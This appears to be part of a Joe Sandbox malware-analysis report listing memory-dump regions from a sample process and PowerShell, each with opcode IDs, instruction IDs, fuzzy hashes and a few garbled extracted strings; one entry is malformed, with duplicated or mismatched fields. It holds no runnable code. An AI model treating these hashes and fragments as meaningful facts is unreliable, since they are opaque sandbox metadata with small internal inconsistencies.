                                                                                                                                                                                                                                • Source File: 0000000F.00000002.2729512856.0000000002B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 02B00000, based on PE: false
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_15_2_2b00000_4268204ace.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                • Opcode ID: 1c4459b711ec20ccc4f7d0040462cef1ca173e4f2485eea649bd3ff03bc3081f
                                                                                                                                                                                                                                • Instruction ID: a7a693bb022bc449124c21207947536e66c383d1c7e14b0e97205abc64c2acb8
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 1c4459b711ec20ccc4f7d0040462cef1ca173e4f2485eea649bd3ff03bc3081f
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 8FE04F78941109DFC710EBACE944A9D77B5EB44314F1049A8D409D3750EB705E549B51
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 0000000F.00000002.2729512856.0000000002B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 02B00000, based on PE: false
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_15_2_2b00000_4268204ace.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                • Opcode ID: 41c2c174105cbe1fb5ed9de55f3035a53b68dcbfd07d44dc36aca9bb1816de68
                                                                                                                                                                                                                                • Instruction ID: 2ad8a01337d82908f8929f80a122e6a6adb741c10784c6c26fdcec7e58ce10bc
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 41c2c174105cbe1fb5ed9de55f3035a53b68dcbfd07d44dc36aca9bb1816de68
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 02D0C938954145CFCB56DB64D89CBA8FBE2BB0A321F1886C4E85A9B2E1C7349C41CF20
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000020.00000002.2594482920.00000000037B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 037B0000, based on PE: false
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_32_2_37b0000_powershell.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                • String ID: kU0o^${U0o^$[0o^
                                                                                                                                                                                                                                • API String ID: 0-1618954945
                                                                                                                                                                                                                                • Opcode ID: 67fe769c87037e1def5486fae03de9e470342de048e4f11124da58a7ac6136f8
                                                                                                                                                                                                                                • Instruction ID: e2b6bf1e8592c9c422a6e1ee5206148661f3f1ff71ee69be49dfa6a2b2377258
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 67fe769c87037e1def5486fae03de9e470342de048e4f11124da58a7ac6136f8
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 79919375B007199BDB29EFB4C4146AEB7F2EF84604B00892CD15AAF350DF745E0A8BC6
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000020.00000002.2594482920.00000000037B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 037B0000, based on PE: false
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_32_2_37b0000_powershell.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                • String ID: kU0o^${U0o^$[0o^
                                                                                                                                                                                                                                • API String ID: 0-1618954945
                                                                                                                                                                                                                                • Opcode ID: 2db0a7e8c70ef598a4cb56d0adbe6bae25059daf2dfeb44fc26f7500d57f0ef8
                                                                                                                                                                                                                                • Instruction ID: 89f4bea6f4b46a65deba60e8fb88f7465bb5e508bd51ea0d273031fdb7e3c70e
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 2db0a7e8c70ef598a4cb56d0adbe6bae25059daf2dfeb44fc26f7500d57f0ef8
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: A7918375B007199BDB29EFB4C4146AEB7F2EF84604B00892CD15AAF354DF745E0A8BC6
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000020.00000002.2594482920.00000000037B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 037B0000, based on PE: false
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_32_2_37b0000_powershell.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                • String ID: ,bq$0oAp$$^q$$^q$$^q$$^q$$^q$$^q
                                                                                                                                                                                                                                • API String ID: 0-4154621813
                                                                                                                                                                                                                                • Opcode ID: d7e1b02ca1bd5327b0e70cef4ab58be45235bdeae8891e2f0647e670edf46a4a
                                                                                                                                                                                                                                • Instruction ID: 75f92e9949915c778fc36b87626de3f90f9125fbb4cd1ebba20067ecea699d9e
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: d7e1b02ca1bd5327b0e70cef4ab58be45235bdeae8891e2f0647e670edf46a4a
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 0451B3303841148FD728DB79E594AED7BF6AF8974031848E9D046CFBA5DE29DC428B52
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000020.00000002.2602242650.0000000007CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07CC0000, based on PE: false
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_32_2_7cc0000_powershell.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                • String ID: 4'^q$4'^q$4'^q$4'^q
                                                                                                                                                                                                                                • API String ID: 0-1420252700
                                                                                                                                                                                                                                • Opcode ID: 84ea015d8d16569522084fca808fb775564e2847b1cc4a859e51f39e88b9dc74
                                                                                                                                                                                                                                • Instruction ID: 64d56f85760114e31c6717cb1086c8dcae1e27d7ed0d02e0ab52a7c0dd21480b
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 84ea015d8d16569522084fca808fb775564e2847b1cc4a859e51f39e88b9dc74
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 831258B1B002958FCB19CB68A85076A7FA6AFC1321F14C0AED545CF396DE35CE45C7A2
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000020.00000002.2602242650.0000000007CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07CC0000, based on PE: false
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000020.00000002.2594482920.00000000037B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 037B0000, based on PE: false
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_32_2_37b0000_powershell.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                • Opcode ID: 63de43e2ba944d8aaad9df98fda154636c0ab663cbb26d19107e7006cd5bc946
                                                                                                                                                                                                                                • Instruction ID: 74fc8444c6352afb3a7e5f30d0cf879ee57bc3d2021e06dd6284b4d964cb49ce
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 63de43e2ba944d8aaad9df98fda154636c0ab663cbb26d19107e7006cd5bc946
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: BA413D346042498FCB09DF64C4A8AE9BBF1EF8E314F19509AE445EB3A6DB31DC01DB61
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000020.00000002.2594482920.00000000037B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 037B0000, based on PE: false
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_32_2_37b0000_powershell.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                • Opcode ID: d29d650205c4906e5ece2cb81afe1d4bd9cf712ded06b192c35c065aa66e3b2a
                                                                                                                                                                                                                                • Instruction ID: e12a1b364657da1eec9df1bb4b88ebd9f89169b96d8208abdea2949a5daccef0
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: d29d650205c4906e5ece2cb81afe1d4bd9cf712ded06b192c35c065aa66e3b2a
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 974136B0A015059FCB05CF48C598AEAFBB1FF48310B158599D815AB365C736FC51CFA0
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000020.00000002.2602242650.0000000007CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07CC0000, based on PE: false
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_32_2_7cc0000_powershell.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                • Opcode ID: 37b82b29f917745cec35012c5c4e771a465eb1c6bc5ebadcdab9a5e65b3eab82
                                                                                                                                                                                                                                • Instruction ID: 92031a82e5d70fe05e90879952b8c72fd55a5588dbd297a9b470f69713cdf66e
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 37b82b29f917745cec35012c5c4e771a465eb1c6bc5ebadcdab9a5e65b3eab82
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 0231D9F0A10242CBCB24CF24E58166AB7B7AF80759F14C09DD9059F39ADB35DE44CBA6
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000020.00000002.2594482920.00000000037B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 037B0000, based on PE: false
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_32_2_37b0000_powershell.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                • Opcode ID: bef378a4149e715768d8a3340892d478f96d9ccc7b82aa513e501a9d2f9c326d
                                                                                                                                                                                                                                • Instruction ID: dac5f539be1a9ba19f2b0a9ffa785665f5e6b77c06c85693a874cc23adc0c89a
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: bef378a4149e715768d8a3340892d478f96d9ccc7b82aa513e501a9d2f9c326d
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 99318E353006029FD705DB78E894B9AB7A6EFC4214F048679D60ACB364DF71E949CB91
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000020.00000002.2594482920.00000000037B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 037B0000, based on PE: false
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_32_2_37b0000_powershell.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                • Opcode ID: 57c02060d92e53fba29b6a5a3c0e5d48c2612f412be53a519f13633d678bf7d7
                                                                                                                                                                                                                                • Instruction ID: 5c55c2adb3958da0d383f1e616f0dfac0fa790c0851d1a9bea1eadcd2bba6eb4
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 57c02060d92e53fba29b6a5a3c0e5d48c2612f412be53a519f13633d678bf7d7
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: C841D634E012099FDB05CBA9D584ADDFBF2AF88304F28C159E414AB366C771ED86CB90
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000020.00000002.2594482920.00000000037B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 037B0000, based on PE: false
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_32_2_37b0000_powershell.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                • Opcode ID: 7aefba4d03bd8a2c21e949a45c0c75aafebac055c646e7f440fa02051d776cec
                                                                                                                                                                                                                                • Instruction ID: 77682b12685437105fff35fe5b40f605976e947dad91ce85bf9eedf9e76a746a
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 7aefba4d03bd8a2c21e949a45c0c75aafebac055c646e7f440fa02051d776cec
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 1F315C74E002099FDB44EFA9D495BEEBBF6EF89311F148069E405EB754EA348C41CB61
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000020.00000002.2594482920.00000000037B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 037B0000, based on PE: false
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_32_2_37b0000_powershell.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                • Opcode ID: 4ed5fafc57dd7ca5c0b459d0741b6086ba86a20a98fc28152f9157371d5c4030
                                                                                                                                                                                                                                • Instruction ID: ee9b0eb54e51f821f4bbc23f81b778c8e275c88a18081ffbeacedb92413068fe
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 4ed5fafc57dd7ca5c0b459d0741b6086ba86a20a98fc28152f9157371d5c4030
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: CB318D74A006059FCB14DF69E594BDEBBF2FF48308F108529E415AB7A4DB34AD49CBA0
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000020.00000002.2594482920.00000000037B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 037B0000, based on PE: false
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_32_2_37b0000_powershell.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                • Opcode ID: 1813a6ba95300d16c8789ce981b32a141138adf70073909ccf1554afa9b0409c
                                                                                                                                                                                                                                • Instruction ID: efa7e9059e06dc36922169718f76392acd892a9d50954d92675c2b58449d5e23
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 1813a6ba95300d16c8789ce981b32a141138adf70073909ccf1554afa9b0409c
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: E3312B747002058FDB14DF68DA94AAABBF6EF88304B1484A9E449CF729EB34DD01CB90
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000020.00000002.2594482920.00000000037B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 037B0000, based on PE: false
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_32_2_37b0000_powershell.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                • Opcode ID: a473029e692b21849263602a3f71b49ffe7f2ba118c78862b2d61f344721c615
                                                                                                                                                                                                                                • Instruction ID: b0d10d5f5f5266c031e4a63bbb037007ce2fc5bfc06bc832a2637218d4a606c6
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: a473029e692b21849263602a3f71b49ffe7f2ba118c78862b2d61f344721c615
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 01112B3A7002188FCB04DBA8E950ADE77F6FFCC265B0440A9E509EB364DB35DC058B90
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000020.00000002.2594482920.00000000037B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 037B0000, based on PE: false
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_32_2_37b0000_powershell.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                • Opcode ID: a123a485f96bed831e6dc4112e4eda12992e9e3c8e8757a094ffc1effee6282e
                                                                                                                                                                                                                                • Instruction ID: 925de390f8c88dfb1aaf0abd043d86cec320f92fdec2f4c661d787bd88038e2f
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: a123a485f96bed831e6dc4112e4eda12992e9e3c8e8757a094ffc1effee6282e
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: C91159718053498FDB10CFAAD9047DEFFF4AF49220F28805AD488A7651D739A585CBA1
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000020.00000002.2602242650.0000000007CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07CC0000, based on PE: false
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_32_2_7cc0000_powershell.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                • Opcode ID: 1ee4dabd6589b07b504a7f18d6b88b332eb4d8c7b9c916783ba06d5085723870
                                                                                                                                                                                                                                • Instruction ID: b9074af5738517138bd331e745fb138e20d718899a8b0d3982cfeb115edc4673
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 1ee4dabd6589b07b504a7f18d6b88b332eb4d8c7b9c916783ba06d5085723870
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 181194B1A10306DFCB20CF59C5C4B66FBF5FB85221F0880AED5098B211D731DA41CBA1
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000020.00000002.2593579252.000000000356D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0356D000, based on PE: false
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_32_2_356d000_powershell.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                • Opcode ID: ac59097383679d3c36945f3a55f47b1b34a77431d90e23eb4db771cfbaa4427a
                                                                                                                                                                                                                                • Instruction ID: 462e9c23c0bdadb6f675b497b9a3ee17939454029d10dfabd76ea515105bbd93
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: ac59097383679d3c36945f3a55f47b1b34a77431d90e23eb4db771cfbaa4427a
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 7A219D76904240DFCF06CF14E9C4B16BF72FB88314F28C5A9D9494B666C33AD46ACB91
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000020.00000002.2594482920.00000000037B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 037B0000, based on PE: false
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_32_2_37b0000_powershell.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                • Opcode ID: cab7c53361a2bb62b10cc32fd584ab0306bf8886469d3e988c43ff97ca28decd
                                                                                                                                                                                                                                • Instruction ID: 8049f2891e67c0ec9bb81c698fdf8f55f4b6e5f77a7388e914bd16fe2a362de7
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: cab7c53361a2bb62b10cc32fd584ab0306bf8886469d3e988c43ff97ca28decd
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 8D11D774A002199FCB04DF98D584AAEFBF5FF89310B148599D919AB361C731ED41CFA0
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000020.00000002.2593579252.000000000356D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0356D000, based on PE: false
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_32_2_356d000_powershell.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                • Opcode ID: e9867b41209b1ae96989907f61c5f808f60e730aab7477091df5884716147213
                                                                                                                                                                                                                                • Instruction ID: b21578fc8006f7d1e7c6f8a35866a9f04e4429ec8b89cde2b4685cd839ccc65f
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: e9867b41209b1ae96989907f61c5f808f60e730aab7477091df5884716147213
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 8B119D79904680DFDB15CF14E5C4B15FFA1FB84328F28C6AAD84A4B666C33AD44ACB61
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000020.00000002.2594482920.00000000037B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 037B0000, based on PE: false
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_32_2_37b0000_powershell.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                • Opcode ID: 451292bcd5e399f2902ed75c31e308deda75d9ae402701f9944ba5414fd4bd84
                                                                                                                                                                                                                                • Instruction ID: a25f4b5e40c1c2106a304d89eadcd4273b72d755b24d983e823e05a3c9c89012
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 451292bcd5e399f2902ed75c31e308deda75d9ae402701f9944ba5414fd4bd84
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 911155B1900209CFDB10CF9AD504BDEFBF4EB48320F28806AD548A7641D339A940CBA5
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000020.00000002.2594482920.00000000037B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 037B0000, based on PE: false
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_32_2_37b0000_powershell.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                • Opcode ID: 4ff46fc3636024005b014ef04fa73e699cbbe438cdbcc7cfe95671e4a75a2fc1
                                                                                                                                                                                                                                • Instruction ID: 6c0881d0419c5036ae51b0810240ec1bce195e0c8f021f40043df384bb1ade6d
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 4ff46fc3636024005b014ef04fa73e699cbbe438cdbcc7cfe95671e4a75a2fc1
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 5C01D2316083449FC718CB79D494AAA7FF4EF45250B1888EEE08ACB6B2CB34EC45CB00
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000020.00000002.2594482920.00000000037B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 037B0000, based on PE: false
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_32_2_37b0000_powershell.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                • Opcode ID: ca4236d150213f92d4d6291f71f1c4d5be64e5a46922011b74e583ac9b99a90a
                                                                                                                                                                                                                                • Instruction ID: fe4a04da1604c142b5e6540f0c3766aed7cf650cbcb520fa60f5dd1050ce3339
                                                                                                                                                                                                                                • Instruction ID: 3b0bdab213bded83abe2fb3ba78b31afcccdfbf7881dd223f7e7b611d5e84848
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: fd8b3efc8f0950453936ba44d55cb73e3d76c3c3f03ed3e76cbb0a8ddfb3c3c5
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 9A01DDB1D0074ADBCB04CFE4C8456EEBBB4BF99300F20572AE015A6644EBB06696CB90
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000020.00000002.2594482920.00000000037B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 037B0000, based on PE: false
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_32_2_37b0000_powershell.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                • Opcode ID: dd64660a4e257c2823b8a0677300ddc515e4771567b6939666e50e5a061fa932
                                                                                                                                                                                                                                • Instruction ID: 556cd09e31367c873e4befc1c6db69ec6c6af4c38568d6471e2f7b3449263dd3
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: dd64660a4e257c2823b8a0677300ddc515e4771567b6939666e50e5a061fa932
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 1FF0A0357007189FC714DA6AE884AAFBBF9EBC8271B00052EE10EC7350DF31AD4587A0
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000020.00000002.2593579252.000000000356D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0356D000, based on PE: false
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_32_2_356d000_powershell.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                • Opcode ID: a3b4ab95fa2ae395d0bb978f4623bdff00b78fac0c4e4c80f4918d99e93b6c47
                                                                                                                                                                                                                                • Instruction ID: 829fde4c15d2e6ffc33e93e82998e8ae4de039e54d9f176f7a4efe0e1edf2466
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: a3b4ab95fa2ae395d0bb978f4623bdff00b78fac0c4e4c80f4918d99e93b6c47
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 7FF0FF75100640AFD715CF06D984D23BBB9FB956607198499A84A5B712C631FC42CF60
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000020.00000002.2594482920.00000000037B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 037B0000, based on PE: false
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_32_2_37b0000_powershell.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                • Opcode ID: 67468af30b77d6466c5177e9cac4e9c5f8723fe0ab8cd7d30e5e378888b87139
                                                                                                                                                                                                                                • Instruction ID: a8bd19d45c93517599f59bf83b20f8ddbd9d5cbe6d7fca4cb85f437c608742f4
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 67468af30b77d6466c5177e9cac4e9c5f8723fe0ab8cd7d30e5e378888b87139
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: EAF027796002059BD310AB65E4187EBB7FAEBC132DF10813AC9094B394CE3D6842C7E1
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000020.00000002.2594482920.00000000037B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 037B0000, based on PE: false
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_32_2_37b0000_powershell.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                • Opcode ID: 7bd2c4b478eac9006826150a442a3bee51e7ed220bdd1495ceac42170ab58e23
                                                                                                                                                                                                                                • Instruction ID: 6bb5a1029d32f289c55138e79c11cbcf432900c0c71dbd9b4c63021e6003e184
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 7bd2c4b478eac9006826150a442a3bee51e7ed220bdd1495ceac42170ab58e23
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 64F0A0393002148FCB14DB6CA940B9A7BB6EFCC2567094296E909DF324DE35CC058B90
                                                                                                                                                                                                                                Memory Dump Source
